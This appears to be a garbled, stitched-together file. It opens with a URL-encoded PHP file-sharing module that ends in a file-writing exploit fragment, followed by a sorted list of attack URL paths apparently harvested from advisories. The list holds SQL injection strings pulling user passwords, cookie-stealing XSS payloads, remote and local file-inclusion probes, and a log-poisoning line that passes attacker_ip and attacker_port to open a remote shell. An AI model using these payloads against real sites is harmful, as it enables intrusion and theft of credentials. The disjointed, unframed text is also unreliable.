C%22center%5C%22%3EThere+are+%24count_files+files+in+the+database.%3C%2Fdiv%3E%3Cbr+%2F%3E%22%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22do_dl%22)+%7B+echo+%24_SERVER%5B'HTTP_REFERER'%5D.%22%3A%22%3B+%7D%0A%0Aif(%24do+%3D%3D+%22dl%22)+%7B%0A%0Aif(strpos(%24_SERVER%5B'HTTP_REFERER'%5D%2C%24url)+!%3D%3D+false)+%7B%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_download'%5D)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22))+%7B%0A%0Ainclude(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0Aif(%24u_rank+%3E%3D+%24fs_access)+%7B%0A%0A%24f_size+%3D+filesize(%24mod_root.%22%2Fuploads%2F%22.%24id)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Cdiv+align%3D%22right%22%3E%3Ca+href%3D%22%24mod_url%22%3EDownloads%3C%2Fa%3E+%26gt%3B+%24fs_product+%26gt%3B+Download+Now%3C%2Fdiv%3E%3Cbr+%2F%3E%0A%0A%3Cspan+class%3D%22title%22%3E%24fs_product%3C%2Fspan%3E%3Cbr+%2F%3E%0A%0A%3Cbr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%3Ctable+border%3D%220%22+cellspacing%3D%224%22+cellpadding%3D%220%22%3E%0A%0A%3Ctr%3E%3Ctd+width%3D%22150%22%3EFile+Name%3A%3C%2Ftd%3E%3Ctd%3E%24fs_product%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EPublisher%3A%3C%2Ftd%3E%3Ctd%3E%24fs_publisher%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EFile+Size%3A%3C%2Ftd%3E%3Ctd%3E%24f_size%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0A%3Cspan+id%3D%22dl%22%3EYou+are+now+downloading+%24fs_product.+Your+download+will+begin+is+%3Cspan+id%3D%22count%22+style%3D%22font-weight%3A+bold%3B%22%3E%24fs_count_down%3C%2Fspan%3E+seconds.%3Cbr+%2F%3E%3C%2Fspan%3E%0A%0A%3Cscript+language%3D%22JavaScript%22%3E%0A%0A%3C!--%0A%0Avar+countDown+%3D+%24fs_count_down%3B%0A%0Afunction+timer()+%7B%0A%0AcountDown--%3B%0A%0Adocument.getElementById('count').innerHTML+%3D+countDown%3B%0A%0Aif(countDown+%3D%3D+0)+%7B%0A%0A%2F%2Flocation.replace(%22%24mod_url%26do%3Ddl_go%26id%3D%24id%22)%3B%0A%0Adocument.getElementById('dl').innerHTML+%3D+%22%3Cb%3E%3Ca+href%3D'%24mod_url%26do%3Ddl_go%26id%3D%24id'%3EBegin+Download%3C%2Fa%3E%3C%2Fb%3E%3Cbr+%2F%3E%22%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0AsetTimeout(%22timer()%3B%22%2C1000)%3B%0A%0A%7D%0A%0A%7D%0A%0Atimer()%3B%0A%0A--%3E%0A%0A%3C%2Fscript%3E%0A%0A%3Cnoscript%3E%0A%0A%3Cbr+%2F%3E%0A%0AJavaScript+is+not+enabled.+Please+click+the+following+link%3A%3Cbr+%2F%3E%0A%0A%3Ca+href%3D%22%24mod_url%26do%3Ddo_dl%26id%3D%24id%22%3EDownload%3C%2Fa%3E%3Cbr+%2F%3E%0A%0A%3C%2Fnoscript%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0Aif((%24fs_access+%3D%3D+0)+%26%26+(%24online+%3D%3D+0))+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AYou+must+be+logged+in+to+download+this+file.+Please+login.%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0AHTML%3B%0A%0A%24viv+%3D+%22Login%22%3B%0A%0A%7D%0A%0Aelse+%7B+%24viv+%3D+%22Not_Enough_Access%22%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0Aelse+%7B%0A%0Aif((%24rank_required%5B'mod_download'%5D+%3D%3D+0)+%26%26+(%24online+%3D%3D+0))+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AYou+must+be+logged+in+to+download+this+file.+Please+login.%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0AHTML%3B%0A%0A%24viv+%3D+%22Login%22%3B%0A%0A%7D%0A%0Aelse+%7B+%24viv+%3D+%22Not_Enough_Access%22%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0Aelse+%7B+derr(%22This+page+cannot+be+accessed+remotely.%22)%3B+%7D%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22view%22)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22))+%7B%0A%0Ainclude(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0A%24f_size+%3D+filesize(%24mod_root.%22%2Fuploads%2F%22.%24id)%3B%0A%0A%24desc+%3D+add_vxcode(%24fs_description%2C0)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Cdiv+align%3D%22right%22%3E%3Ca+href%3D%22%24mod_url%22%3EDownloads%3C%2Fa%3E+%26gt%3B+%24fs_product%3C%2Fdiv%3E%3Cbr+%2F%3E%0A%0A%3Cspan+class%3D%22title%22%3E%24fs_product%3C%2Fspan%3E%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+border%3D%220%22+cellspacing%3D%224%22+cellpadding%3D%220%22%3E%0A%0A%3Ctr+valign%3D%22top%22%3E%3Ctd+width%3D%2230%25%22%3E%0A%0A%3Ca+href%3D%22%24mod_url%26do%3Ddl%26id%3D%24id%22%3E%3Cimg+src%3D%22%24url%2Fmodules%2F%24mod%2Fimages%2Fdownload.gif%22+border%3D%220%22+alt%3D%22Download%22+%2F%3E%3C%2Fa%3E%0A%0A%3C%2Ftd%3E%3Ctd+width%3D%2270%25%22%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EFile%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_name%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3ESize%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24f_size%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EPublisher%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%22%24fs_website%22%3E%24fs_publisher%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EUploaded+By%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_author%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EDate+Posted%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_date%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3EDownloads%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_downloads%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Cb%3ERating%3C%2Fb%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_rating%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3Chr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+%24sp_htd%3EDescription%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%24desc%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aelse+%7B+derr(%22File+not+found.%22)%3B+%7D%0A%0A%7D%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_account'%5D)+%7B%0A%0Aif(%24do+%3D%3D+%22upload%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EFS%3A+Upload%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%3Cform+action%3D%22%24mod_url%26do%3D_upload%26ls%3D%24login_session%22+method%3D%22POST%22+enctype%3D%22multipart%2Fform-data%22%3E%0A%0A%3Cfieldset%3E%0A%0A%3Clegend%3EFile%3C%2Flegend%3E%0A%0A%3Ctable+cellspacing%3D%224%22+cellpadding%3D%220%22+border%3D%220%22%3E+%0A%0A%3Ctr%3E%3Ctd%3ELocation%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22file%22+name%3D%22upload%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3C%2Ffieldset%3E%3Cbr+%2F%3E%0A%0A%3Cfieldset%3E%0A%0A%3Clegend%3EInformation%3C%2Flegend%3E%0A%0A%3Ctable+cellspacing%3D%224%22+cellpadding%3D%220%22+border%3D%220%22%3E+%0A%0A%3Ctr%3E%3Ctd%3EProduct%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22product%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EPublisher%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22publisher%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3ECategory%3A%3C%2Ftd%3E%3Ctd%3E%0A%0A%3Cselect+name%3D%22category%22+%2F%3E%0A%0AHTML%3B%0A%0A%24categories+%3D+%22%22%3B%0A%0A%24out+%3D+array()%3B%0A%0Arequire(%24mod_root.%22%2Fcategories.php%22)%3B%0A%0Aunset(%24names)%3B%0A%0Awhile(%24categories+!%3D+%22%22)+%7B%0A%0A%24sub+%3D+array()%3B%0A%0A%24arr+%3D+explode(%22%7C%7C%22%2C%24categories)%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(%24single+!%3D+%22%22)+%7B%0A%0A%24arrx+%3D+explode(%22%26%26%22%2C%24single)%3B%0A%0Aarray_push(%24out%2C%22%3C!--+%24arrx%5B0%5D+--%3E%3Coption+value%3D%5C%22%24arrx%5B1%5D%5C%22%3E%24arrx%5B0%5D%3C%2Foption%3E%5Cn%22)%3B%0A%0Aarray_push(%24sub%2C%24arrx%5B1%5D)%3B%0A%0A%24names%5B%22%24arrx%5B1%5D%22%5D+%3D+%24arrx%5B0%5D%3B%0A%0A%7D%0A%0A%7D%0A%0A%24categories+%3D+%22%22%3B%0A%0Aforeach(%24sub+as+%24single)+%7B%0A%0A%24categories+.%3D+str_replace(%22%7C%7C%22%2C%22%7C%7C%22.%24names%5B%22%24single%22%5D.%22+%2F+%22%2C%24subcat%5B%22%24single%22%5D)%3B%0A%0A%7D%0A%0A%7D%0A%0Anatcasesort(%24out)%3B%0A%0Aforeach(%24out+as+%24single)+%7B%0A%0Aecho+%24single%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3C%2Fselect%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd%3EWebsite%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22product_website%22+size%3D%2250%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_admin'%5D)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr%3E%3Ctd%3EAccess+to+Download%3Cbr+%2F%3E(Besides+Default)%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D%22text%22+name%3D%22access%22+value%3D%22-1%22+size%3D%222%22+%2F%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr%3E%3Ctd+colspan%3D%222%22%3EDescription%3A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr%3E%3Ctd+colspan%3D%222%22%3E%0A%0A%3Ctextarea+name%3D%22description%22+cols%3D%2270%22+rows%3D%2210%22%3E%3C%2Ftextarea%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0A%3C%2Ffieldset%3E%3Cbr+%2F%3E%0A%0A%3Cdiv+align%3D%22center%22%3E%3Cinput+type%3D%22submit%22+value%3D%22Upload%22+%2F%3E+%3Cinput+type%3D%22reset%22+value%3D%22Reset%22+%2F%3E%3C%2Fdiv%3E%0A%0A%3C%2Fform%3E%3Cbr+%2F%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22_upload%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EFS%3A+Upload%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AHTML%3B%0A%0Aif(%24ls+%3D%3D+%24login_session)+%7B%0A%0A%24err+%3D+0%3B%0A%0A%24id+%3D+make_code(50)%3B%0A%0A%24product+%3D+alter(%24_POST%5B'product'%5D)%3B%0A%0A%24publisher+%3D+alter(%24_POST%5B'publisher'%5D)%3B%0A%0A%24category+%3D+alter(%24_POST%5B'category'%5D)%3B%0A%0A%24product_website+%3D+alter(%24_POST%5B'product_website'%5D)%3B%0A%0A%24description+%3D+alter(%24_POST%5B'description'%5D)%3B%0A%0A%24ext+%3D+substr(strrchr(%24_FILES%5B'upload'%5D%5B'name'%5D%2C%22.%22)%2C1)%3B%0A%0Aif(blankc(%24_FILES%5B'upload'%5D%5B'name'%5D%2C%22Upload%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(blankc(%24product%2C%22Product%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(blankc(%24category%2C%22Category%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(blankc(%24description%2C%22Description%22))+%7B+%24err+%3D+1%3B+%7D%0A%0Aif(%24_FILES%5B'upload'%5D%5B'size'%5D+%3E+FS_MAX_SIZE)+%7B+derr(%22File+is+too+large.+Limit%3A+%22.%24fs_max_size)%3B+%24err+%3D+1%3B+%7D%0A%0Aif(%24fs_ext_allow+!%3D+%22%22)+%7B%0A%0A%24arr+%3D+explode(%22%2C%22%2C%24fs_ext_allow)%3B%0A%0A%24err+%3D+1%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(strtolower(%24ext)+%3D%3D+strtolower(%24single))+%7B+%24err+%3D+0%3B+%7D%0A%0A%7D%0A%0Aif(%24err+%3D%3D+1)+%7B+derr(%22File+extension+(%24ext)+is+not+allowed.+Extensions+allowed+are%3A+%22.str_replace(%22%2C%22%2C%22%2C+%22%2C%24fs_ext_allow))%3B++%7D%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24arr+%3D+explode(%22%2C%22%2C%24fs_ext_unallow)%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(strtolower(%24ext)+%3D%3D+strtolower(%24single))+%7B+derr(%22File+extension+(%24single)+is+not+allowed.%22)%3B+%24err+%3D+1%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0Aif(%24err+%3D%3D+0)+%7B%0A%0Aif(move_uploaded_file(%24_FILES%5B'upload'%5D%5B'tmp_name'%5D%2C%24mod_root.%22%2Fuploads%2F%22.%24id))+%7B%0A%0A%24fs_files+%3D+%22%22%3B%0A%0Arequire(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22)%3B%0A%0A%24fs_files+.%3D+%22%7C%7C%22+.+%24id%3B%0A%0A%24name+%3D+basename(%24_FILES%5B'upload'%5D%5B'name'%5D)%3B%0A%0A%24author+%3D+%24usr%3B%0A%0A%24date_posted+%3D+%24date%3B%0A%0A%24downloads+%3D+0%3B%0A%0A%24rating+%3D+0%3B%0A%0Aif(%24u_rank+%3E%3D+%24rank_required%5B'mod_admin'%5D)+%7B%0A%0A%24access+%3D+alter(%24_POST%5B'access'%5D)%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24access+%3D+0%3B%0A%0A%7D%0A%0Adefine('FS_WRITE'%2C%22edit%22)%3B%0A%0Arequire(%24mod_root.%22%2Ffs_file.php%22)%3B%0A%0Awf(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22%2C%22w%22%2C%24fs_file)%3B%0A%0Arequire(%24root.%22%2Fuser_info.php%22)%3B%0A%0Awf(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22%2C%22w%22%2C%24user_info)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0AFile+successfully+uploaded.%3Cbr+%2F%3E%0A%0A%3Cdiv+align%3D%22center%22%3E%0A%0A(%3Ca+href%3D%22%24mod_url%26do%3Dview%26id%3D%24id%22%3EView+File%3C%2Fa%3E)%3Cbr+%2F%3E%0A%0A(%3Ca+href%3D%22%24mod_url%26do%3Dmanage%22%3EManage+Uploads%3C%2Fa%3E)%3Cbr+%2F%3E%0A%0A(%3Ca+href%3D%22%24mod_url%26do%3Dupload%22%3EUpload+Another+File%3C%2Fa%3E)%3Cbr+%2F%3E%0A%0A%3C%2Fdiv%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aelse+%7B+derr(%22Failed+to+upload+file.%22)%3B+%7D%0A%0A%7D%0A%0A%7D%0A%0Aelse+%7B+derr(%22Bad+session.%22)%3B+%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22delete_upload%22)+%7B%0A%0Aif(%24ls+%3D%3D+%24login_session)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22))+%7B%0A%0Arequire(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0Aif(strtolower(%24usr)+%3D%3D+strtolower(%24fs_author))+%7B%0A%0Aunlink(%24mod_root.%22%2Ffiles%2F%22.%24id.%22.php%22)%3B%0A%0Aunlink(%24mod_root.%22%2Fuploads%2F%22.%24id)%3B%0A%0Arequire(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22)%3B%0A%0A%24fs_files+%3D+str_replace(%22%7C%7C%22.%24id%2C%22%22%2C%24fs_files)%3B%0A%0Arequire(%24root.%22%2Fuser_info.php%22)%3B%0A%0Awf(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22%2C%22w%22%2C%24user_info)%3B%0A%0A%7D%0A%0A%7D%0A%0A%24do+%3D+%22manage%22%3B%0A%0A%7D%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22edit_upload%22)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EEdit+Upload%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0AThis+feature+is+still+under+development.%3Cbr+%2F%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aif(%24do+%3D%3D+%22manage%22)+%7B%0A%0Arequire(%24root.%22%2Fusers%2F%22.strtolower(%24usr).%22.php%22)%3B%0A%0Aif(%24fs_files+%3D%3D+%22%22)+%7B%0A%0A%24uploaded_files+%3D+0%3B%0A%0A%7D%0A%0Aelse+%7B%0A%0A%24uploaded_files+%3D+count(explode(%22%7C%7C%22%2C%24fs_files))+-+1%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+align%3D%22center%22+%24sp_htd%3EStats%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%0A%0A%24uploaded_files+uploaded+files.%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%3Cbr+%2F%3E%0A%0A%3Ctable+width%3D%22100%25%22+%24sp_table%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+colspan%3D%226%22+align%3D%22center%22+%24sp_htd%3EUploaded+Files%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3Ctr+%24sp_htr%3E%3Ctd+width%3D%2240%25%22+%24sp_htd%3EName%3C%2Ftd%3E%3Ctd+width%3D%2220%25%22+%24sp_htd%3EDate+Added%3C%2Ftd%3E%3Ctd+width%3D%2215%25%22+%24sp_htd%3ERating%3C%2Ftd%3E%3Ctd+width%3D%2215%25%22+%24sp_htd%3EDownloads%3C%2Ftd%3E%3Ctd+width%3D%2220%25%22+%24sp_htd%3ESize%3C%2Ftd%3E%3Ctd+width%3D%2210%25%22+%24sp_htd%3EAction%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%24arr+%3D+explode(%22%7C%7C%22%2C%24fs_files)%3B%0A%0A%24x+%3D+0%3B%0A%0Aforeach(%24arr+as+%24single)+%7B%0A%0Aif(%24single+!%3D+%22%22)+%7B%0A%0Aif(file_exists(%24mod_root.%22%2Ffiles%2F%22.%24single.%22.php%22))+%7B%0A%0Arequire(%24mod_root.%22%2Ffiles%2F%22.%24single.%22.php%22)%3B%0A%0A%24fs_size+%3D+filesize(%24mod_root.%22%2Ffiles%2F%22.%24single.%22.php%22)%3B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%22%24mod_url%26do%3Dview%26id%3D%24single%22%3E%24fs_product+(%24fs_name)%3C%2Fa%3E%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_date%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_rating%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_downloads%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%24fs_size%3C%2Ftd%3E%3Ctd+%24sp_ctd%3E%3Ca+href%3D%22%24mod_url%26do%3Dedit_upload%26id%3D%24single%22+alt%3D%22Edit%22%3E%5BE%5D%3C%2Fa%3E+%3Ca+href%3D%22%24mod_url%26do%3Ddelete_upload%26id%3D%24single%26ls%3D%24login_session%22+alt%3D%22Delete%22%3E%5BX%5D%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%24x%2B%2B%3B%0A%0A%7D%0A%0A%7D%0A%0A%7D%0A%0Aif(%24x+%3D%3D+0)+%7B%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+colspan%3D%226%22+align%3D%22center%22+%24sp_ctd%3ENo+files+uploaded.%3C%2Ftd%3E%3C%2Ftr%3E%0A%0AHTML%3B%0A%0A%7D%0A%0Aecho+%3C%3C%3CHTML%0A%0A%3Ctr+%24sp_ctr%3E%3Ctd+colspan%3D%226%22+align%3D%22right%22+%24sp_ctd%3E%3Ca+href%3D%22%24mod_url%26do%3Dupload%22%3EUpload+File%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftd%3E%3C%2Ftr%3E%0A%0A%3C%2Ftable%3E%0A%0AHTML%3B%0A%0A%7D%0A%0A%7D%0A%0A%3F%3E\")); fclose($r0x);die;"}), {"Accept": "text
/?mod=read&id=..
modretor
modretor                                                                               
modrules.php?act=delete&id=waraxe
modrules.php?act=edited" method="post">
modrules.php?act=newsect&
mods
_mods
MODs
mods_adm.php?
mod_settings.php?pixie_user=DSecRG&pixie_user_privs=2&x=..
mods.php?
mod_spo
modstart.php?mod_dir=[spread???]
mod_stats.php
mod_tag_funcs.php?MOA_PATH=[AvriLhea]          
mod_tag_view.php?MOA_PATH=[AvriLhea]          
mod_task.php?gfwww=[Shell]
modul
module
/?module=..
Module
/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
/?module=" + apache_log + "%00" + "&addr=" + attacker_ip + "&port=" + attacker_port
/?module=" + apache_log + "%00" + "&addr=" + attacker_ip + "&port=" + attacker_port)
module-Content-view-pid-2.html  
module_coupons
moduledemo
/?module=download
moduleff.php for example to see the result (a lot of page use __LANG to include lang file)
module_fichier
module_form&module_id=1' and '1'='1
/?module=Invoice&action=InvoiceAjax&file=bar
module_pages_site.php?post=..
module_pages_site.php?post=$shell[$i]");
[module_path]
module.php?link=....
module.php?menu=Evil-script?
module.php?modname=content&cid=9
module.php?modname=ezshopingcart&ac=c&cid=1
module.php?modname=faq&mf=faqviewgroup&mid=1
module.php?modname=gallery&mf=view&gid=1
module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL]
module.php?module=gallery&modPage=show_pictures&artist=[SQL]
module.php?module=gallery&modPage=show_pictures&exhibition=[SQL]
module.php?module=gallery&modPage=view_artists
module.php?module=gallery&modPage=view_availibilities
module.php?module=gallery&modPage=view_empty_picture_associates
module.php?module=gallery&modPage=view_exhibitions
module.php?module=gallery&modPage=view_genres
module.php?module=gallery&modPage=view_media
module.php?module=gallery&modPage=view_pictures
module.php?module=helpcenter&file=..
module.php?module=helpcenter&file=[LFI]
module.php?module=osTicket&file=
module.php?module=osTicket&file=..
module.php?module=simple_messaging&view=compose&to=[VALID_FRIEND]&return=[URL]
module.php?module=simple_messaging&view=delmsg&msg_id=
module.php?module=simple_messaging&view=delmsg&msg_id=[MESSAGE_ID]
module.php?phpbb_root_path=[evil_scripts]
/?module=PNphpBB2&file=viewforum&f=1&order=ASC, (SELECT user_password FROM pn_phpbb_users WHERE user_id=2 AND IF(ORD(SUBSTR(user_password,1,1))>52,BENCHMARK(2500000,MD5(71337)),1))
modules
modules\
Modules
modules_data.php?phpbb_root_path=[shell]
ModulesPage.class.php?base_path=[evil_scripts]
modules.php
modules.php?
modules.php">
modules.php?0p=modload&name=Reviews&file=index&req=showcontent&id=1&title=%253cscript>alert%2528document.cookie);%253c
modules.php?install=..
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert
modules.php?mod=fm&file=..
modules.php?modload=..
modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2
modules.php?modload=<LFI>
modules.php?modload=News&op=view&id=1+AND+1=1#
modules.php?modload=Pages&op=view&id=1+ORDER+BY+5
modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()<
modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20user
modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2
modules.php\n";
modules.php\n";    
modules.php?name=AvantGo&file=print&sid=
modules.php?name=AvantGo&file=print&sid=[Any_Text]
modules.php?name=Bookmarks&file=del_cat&catname=[htmlcode]
modules.php?name=Bookmarks&file=del_mark&markname=[htmlcode]
modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode]
modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode]
modules.php?name=Bookmarks&file=marks
modules.php?name=Bookmarks&file=marks&category=1\' 
modules.php?name=Bookmarks&file=marks&catname=1&category=-1
modules.php?name=Bookmarks&file=marks&catname=[htmlcode]
